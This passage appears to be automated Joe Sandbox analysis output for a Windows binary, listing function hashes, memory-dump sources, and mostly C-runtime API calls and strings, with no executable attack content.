                                  • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                  • Instruction ID: 0c4eebc1dbbac83975ae7d595cab714a20740ebe70a5eeae72328946dd9c27d9
                                  • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                  • Instruction Fuzzy Hash: D3118272F1AA0B05F7541938E97637910456F9A3F8F140634E5AF063EB8F2CE8A0A90D
                                  APIs
                                  • FlsGetValue.KERNEL32(?,?,?,00007FFDAC09766F,?,?,00000000,00007FFDAC09790A,?,?,?,?,?,00007FFDAC097896), ref: 00007FFDAC0996A3
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFDAC09766F,?,?,00000000,00007FFDAC09790A,?,?,?,?,?,00007FFDAC097896), ref: 00007FFDAC0996C2
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFDAC09766F,?,?,00000000,00007FFDAC09790A,?,?,?,?,?,00007FFDAC097896), ref: 00007FFDAC0996EA
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFDAC09766F,?,?,00000000,00007FFDAC09790A,?,?,?,?,?,00007FFDAC097896), ref: 00007FFDAC0996FB
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFDAC09766F,?,?,00000000,00007FFDAC09790A,?,?,?,?,?,00007FFDAC097896), ref: 00007FFDAC09970C
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                  • Instruction ID: bf988ba5ce50a8cb980a477e536f33d4016bb995dd84861093a3373074c1ed0f
                                  • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                  • Instruction Fuzzy Hash: EA119020F0F24245FA68A72565713B9A1829F847F0F584B34E87D4A7D7EF2CF461A60C
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                  • Instruction ID: bf95e2b81b6420091a22ea52ab7eed8b04507d36542230f6c1c4dfe71511724f
                                  • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                  • Instruction Fuzzy Hash: EB11EC50B0F20749FA68676154713BA21818F857F0F580B34D53E097E7EF2CF461A64C
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CallEncodePointerTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 3544855599-2084237596
                                  • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                  • Instruction ID: 4f106d336c5bb2f8d87d6da2653c844104ed32c88ee74892929f8cf08e1ab514
                                  • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                  • Instruction Fuzzy Hash: 2591A173B09B818AEB10CB65E4603AD7BA0FB447D8F10423AEA4D57756DF38D1A5DB08
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 2395640692-1018135373
                                  • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                  • Instruction ID: f125c3b44b6a96db492e5f1f2e7081d186f6bf7167b6f4a0b3204a1e4e6d2bd0
                                  • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                  • Instruction Fuzzy Hash: 2051B332B1AA428ADB14CB29D464B797791EB44BE8F108131DA4E43786DF7DE861DF0C
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CallEncodePointerTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 3544855599-2084237596
                                  • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                  • Instruction ID: f38fa8319e6193211819f5d91bfdf7d4a1791637820d8b74b664356c8fd80347
                                  • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                  • Instruction Fuzzy Hash: 7961B332A09BC585DB708B16E4503AAB7A0FB857E4F044235EB9C47B96DF7CD1A0DB08
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                  • String ID: csm$csm
                                  • API String ID: 3896166516-3733052814
                                  • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                  • Instruction ID: 3251e552995eb78531e25af13cd17e5b6c0d58f23df737aba0aabe2c0dab3945
                                  • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                  • Instruction Fuzzy Hash: 9F519072B093828AEF648F1694A436877A0EB55BE4F144235DA5D87BD6CF3CE460DB0C
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: AddressHandleLoadModuleProc
                                  • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                  • API String ID: 3055805555-3733552308
                                  • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                  • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                  • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                  • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Process$CurrentSizeWorking
                                  • String ID: Shrinking process size
                                  • API String ID: 2122760700-652428428
                                  • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                  • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                  • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                  • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Enter$Leave
                                  • String ID:
                                  • API String ID: 2801635615-0
                                  • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                  • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                  • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                  • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                  • String ID:
                                  • API String ID: 2718003287-0
                                  • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                  • Instruction ID: 57212dcf81657d830cd602791cb2d584250d612fcc47a3c582fcab6cf22f4865
                                  • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                  • Instruction Fuzzy Hash: 09D1D332B0A68189E720CF65D4502ED37B1FB44BE8B044236DE6D57B9ADF38D826D348
                                  APIs
                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFDAC09ED07), ref: 00007FFDAC09EE38
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFDAC09ED07), ref: 00007FFDAC09EEC3
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: ConsoleErrorLastMode
                                  • String ID:
                                  • API String ID: 953036326-0
                                  • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                  • Instruction ID: 65cf396ca9daeb5c287e83be7999786487bdef41c1fed35b0675702a196e6776
                                  • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                  • Instruction Fuzzy Hash: 9491E432F1A65189F7608F2594603BD2BA4BB04BE8F144139DE6E57796CF38D862E30C
                                  APIs
                                  • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                  • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                  • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                  • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CriticalEventSection$EnterLeaveReset
                                  • String ID:
                                  • API String ID: 3553466030-0
                                  • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                  • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                  • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                  • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CriticalEventSection$EnterLeaveReset
                                  • String ID:
                                  • API String ID: 3553466030-0
                                  • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                  • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                  • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                  • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                  • String ID:
                                  • API String ID: 2933794660-0
                                  • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                  • Instruction ID: 5989ed792cf78ce745268d8fa8af2de30795a36b9f852769ac380e83fa9661fd
                                  • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                  • Instruction Fuzzy Hash: 62114C22B15B018AEB008B61E8647A833A4F7187A8F040E31DA2D46BA5DF38D164C348
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CreateEvent$CriticalInitializeSection
                                  • String ID:
                                  • API String ID: 926662266-0
                                  • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                  • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                  • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                  • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: __except_validate_context_record
                                  • String ID: csm$csm
                                  • API String ID: 1467352782-3733052814
                                  • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                  • Instruction ID: ee1289e170f526d1775413030b203c6a1058cac87d764d736041cb2a726b8e32
                                  • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                  • Instruction Fuzzy Hash: 1B71A27260A6818ADB648B16946077D7BA0FB04BE4F048235EE4C87B86CB3DD461D74C
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CreateFrameInfo__except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 2558813199-1018135373
                                  • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                  • Instruction ID: fea5f45f6ce24004b2ff1f1fcae8e297d5dd2c920970ef696110e02898914519
                                  • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                  • Instruction Fuzzy Hash: 2D514E3671AB4196E660AF15E45036E77A4FB89BE0F140538EB8D07B56CF3CE861DB08
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: ErrorFileLastWrite
                                  • String ID: U
                                  • API String ID: 442123175-4171548499
                                  • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                  • Instruction ID: 518e53b1c62956577cf75dfe6c3dcc4dcf3863becbd0c28386748e0d80f80de2
                                  • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                  • Instruction Fuzzy Hash: 7441F332B1AA4186DB20CF25E4543AA77A0FB887E4F404031EE9E87799DF3CD451DB48
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: ExceptionRaise
                                  • String ID: csm
                                  • API String ID: 3997070919-1018135373
                                  • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                  • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                  • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                  • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                  APIs
                                    • Part of subcall function 00007FFDAC093A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFDAC093A63
                                  • __GSHandlerCheckCommon.LIBCMT ref: 00007FFDAC0A0993
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CheckCommonHandler__except_validate_context_record
                                  • String ID: csm$f
                                  • API String ID: 1543384424-629598281
                                  • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                  • Instruction ID: b04e9d7b189b38ecfd0487f43877850f54195e8ea920b281c0a23ce2e1c2bcb3
                                  • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                  • Instruction Fuzzy Hash: AC110632B1578589E7109F12E45126D6764EB44FE4F088035EF890BB57CF38D961CB0C
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
